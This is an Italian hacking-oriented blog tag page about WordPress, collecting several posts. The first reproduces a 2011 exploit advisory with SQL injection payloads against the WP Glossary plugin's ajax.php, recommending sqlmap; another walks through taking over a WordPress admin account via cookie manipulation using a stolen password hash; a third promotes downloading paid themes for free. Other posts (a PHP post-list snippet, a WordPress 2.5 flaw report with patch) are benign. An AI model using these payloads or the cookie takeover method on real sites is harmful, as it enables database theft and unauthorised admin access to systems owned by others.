Articoli con tag wordpress

Nuovo Exploit sfrutta un bug di WP Glossary

0
3 mesi fa
Scritto da Rocco Musolino in ,

In data 30/10/2011 un nuovo bug è stato riscontrato nel Plug-in per WordPress: WP Glossary.
Attraverso una vulnerabilità di tipo SQL Injection e l’exploit qui sotto riportato (è consigliato l’utilizzo di tool come SQLMAP), è possibile sfruttare tale vulnerabilità.
E’ consigliabile dunque aggiornare il plug-in.

######################################################
# Exploit Title: WordPress WP Glossary plugin SQL Injection Vulnerability
# Date: 2011-30-10
# Author: longrifle0x
# software: Wordpress
# Download: http://wordpress.org/extend/plugins/wp-glossary/
# Tools: SQLMAP
######################################################
 
*DESCRIPTIONDiscovered a vulnerability in WP Glossary, Wordpress Plugin,
vulnerability is SQL injection.
File: wp-content/plugins/wp-glossary/ajax.php
Exploit: id=-1; or 1=if
 
*Exploitation*
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][CURRENT_USER()
http://localhost:80/wp-content/plugins/wp-glossary/ajax.php
 [GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/
wp-content/plugins/wp-glossary/ajax.php [GET][id=-1][MID((VERSION()),1,6)
 
 
***Greetz: Georgian Underground Community***

PHP – Lista alfabetica articoli su WordPress.

8
1 anno fa
Scritto da Rocco Musolino in , ,

Come mostrare una lista in ordine alfabetico di tutti gli articoli pubblicati sul blog WordPress con poche linee di codice PHP.

<?php  
$pq = 'post_status=publish&order=DESC&showposts=5';  
$prox = new WP_Query($pq);  
if ($prox->have_posts()) { ?>  
<ul>  
<?php  
while ($prox->have_posts()) : $prox->the_post();  
$unico = $post->ID;  
?>  
<li><?php the_title(); ?> (<?php the_time('j F Y'); ?>)</li>  
<?php endwhile; ?>  
</ul>  
<?php } ?>

Lo script attualmente mostra 5 articoli, cambiando il valore showposts della query in alto, potete personalizzare il numero di articoli che volete visualizzare (showposts=10 <-- mostrerà 10 articoli).

Testato e 100% funzionante.

PHP Hack su WordPress

Vi piace questo template? Votate.

1
1 anno fa
Scritto da Rocco Musolino in ,

Eh da giorni che ci penso ormai, che ne direste di cambiare la grafica del sito? una modifica al template andrebbe più che bene no?
Questa grafica forse non fa tanto sito stile “hacker” eheh..

Vi ho preparato un piccolo sondaggio, esprimete la vostra opinione e commentate.



Scaricare siti o temi wordpress – GRATIS!

4
2 anni fa
Scritto da Rocco Musolino in , ,

In questo video potete vedere come è possibile scaricare interi siti web con un apposito programma, di conseguenza può tornare utile per scaricare temi wordpress a pagamento, quindi personalizzare al massimo il proprio blog con design che valgono parecchio!

Buona Visione! :P

Accesso tramite cookies…

0
3 anni fa
Scritto da Rocco Musolino in

Ciao a tutti :) , oggi rispondo alla domanda di un ragazzo che ci segue spesso,
Avendo già prelevato da un DataBase l’hash dell’admin, spiegherò come manipolare i cookie qualora il nostro md5 decrypter non riesca a decriptare l’hash md5 in tempi ristretti, appunto semplicemente modificando i cookies e seguendo giusti procedimenti potremo accedere con privilegi amministrativi al nostro cms in questione!

Iniziamo col dire, cosa sono i cookie? e cos’è un’hash md5?
dunque i cookie, letteralmente biscotti, sono inviati dal sito web e memorizzati sul computer, essi tengono traccie memorizzando particolari dati criptati.
l’hash md5 invece è l’acronimo di Message Digest algorithm 5 ed è un algoritmo per la crittografia dei dati a senso unico, per senso unico si intende che partendo dalla stringa di output (128 bit) non si può arrivare alla stringa che l’ha generata, può essere paragonata a una testa, una volta tagliata non c’è modo di riattaccarla.

Prendendo come esempio la fase di log-in ad un cms wordpress possiam notare che dando uno sguardo ai cookie già presenti.
vi siano solo cookie riguardanti la visita al wordpress. A questo punto, per procurarci dei cookie da utente loggato, ci registriamo al blog e ci logghiamo, dopodichè andiamo a modificare le stringhe degli stessi per avere accesso come admin in questo modo:

  • Criptiamo nuovamente il nostro hash md5 (Bisogna sapere, che il wordpress come tante altre piattaforme genera cookie contenenti password doppiamente criptate).
  • Procuriamoci l’user della corrispondente password.

    • Ricarichiamo la pagina, ehhh BINGO! siamo dentro…

    Ricordo che questa guida è solo a scopo illustrativo, se vi è piaciuta vi invoglio a registrarvi dai nostri partners affiliati qui sotto contribuendo così a mantenere la board attiva per offrire un servizio sempre migliore!

    2 exploit per WordPress 2.5

    0
    3 anni fa
    Scritto da Rocco Musolino in , , ,

    techjam.itWordpress 2.5

    Aggiornare o non aggiornare… Passare alla 2.5 oppure aspettare la 2.5.1?Il dilemma è veramente enorme tuttavia molti di noi si sono lasciati trasportare dalle novità grafiche e funzionali di WordPress 2.5.

    Oggi vi voglio segnalare tuttavia due exploit presenti in WordPress 2.5 (anche se ce n’è uno pure in WordPress 2.3.3). Il primo consente all’utenza senza i diritti di creare altri utenti, di crearli. Il secondo è definito un “multiple SQL injection”: dal form del commento è possibile inserire codice malevolo, prendere e modificare dati direttamente all’interno del database.

    Andiamo ora nel dettaglio degli errori di WordPress 2.5.

    Come è noto, WordPress 2.5 ha alcuni gravi errori nel sistema di upload dei file multimediali ed alcune incompatibilità con IE 7. Se questo non bastava a rilasciare la 2.5.1, credo che un bug critical lo sia.

    A distanza di poche ore dal rilascio ufficiale di WordPress 2.5, è stato rilevato una falla di sicurezza indicata come “critical”. Un utente registrato su WordPress che non ha permessi per modificare gli altri utenti può creare un nuovo utente. Per fortuna qualche utente ha già provveduto a correggere l’errore.

    La seconda falla credo sia da considerare a livello “super critical” infatti un visitatore potrebbe accedere DIRETTAMENTE al database SQL estraendo dati sensibili oppure modificandoli.

    Le falle sono chiaramente molto gravi.

    Ovviamente tutto questo pone anche una domanda agli utilizzatori di WordPress 2.5: perchè il team WordPress attende per il rilascio della patch? La mia ipotesi è che non voglia creare allarmismi oppure farsi una brutta “fama”. Ultimamente c’è una gara a chi rilascia prima la nuova versione “stabile” del CMS, quasi tutti questi, a causa di uno scarso test pre-rilascio, finiscono per avere una patch di sicurezza nei giorni successivi al rilascio. Penso che Worpdress.org lo voglia evitare.

    Ma è giusto tutto ciò? Secondo me assolutamente no quindi consiglio a coloro che leggono questo articolo di diffondere il problema e diffondere la patch che ho incluso.

    Patch:

    Download HERE

    Ricordo a tutti che questa patch risolve tutti i problemi di alto livello riscontrati e corretti fino ad ora su WordPress 2.5 ma non risolve la seconda falla, dato che non ho ulteriori informazioni per analizzarla.

    Per l’installazione potete sostituire senza paura tutti i files. Le correzioni sono ufficiali

    Grazie a tutti.

    Torna all'inizio